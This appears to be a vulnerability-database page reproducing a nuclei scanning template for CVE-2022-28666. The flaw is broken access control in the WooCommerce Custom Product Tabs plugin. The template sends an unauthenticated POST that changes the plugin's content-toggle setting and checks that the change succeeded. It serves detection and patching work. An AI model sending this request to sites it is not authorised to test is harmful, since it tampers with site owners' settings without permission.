Lucene search
K

Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update

šŸ—“ļøĀ 03 Jul 2026Ā 03:01:05Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 15Ā Views

Unauthenticated users can update content toggle in Custom Product Tabs for WooCommerce below 1.7.8.

Related
Refs
Code
id: CVE-2022-28666

info:
  name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
  author: Sourabh-Sahu
  severity: medium
  description: |
    YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
  impact: |
    Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
  remediation: |
    Update to the latest version of the plugin, above 1.7.7.
  reference:
    - https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28666
    epss-score: 0.01226
    epss-percentile: 0.65162
    cwe-id: CWE-287
    cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "yikes-inc-easy-custom"
  tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive

http:
  - raw:
      - |
        POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        toggle_the_content=false

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'success','Settings updated')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450221009a95f1621d4f7a9eda11040385cd5af4197794606361500ec115ad02dc50b78002205fc27fe93f993a921f11e3a40dc4b21264c3a383d68e253e350641c422b00b90:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3
EPSS0.01226
SSVC
15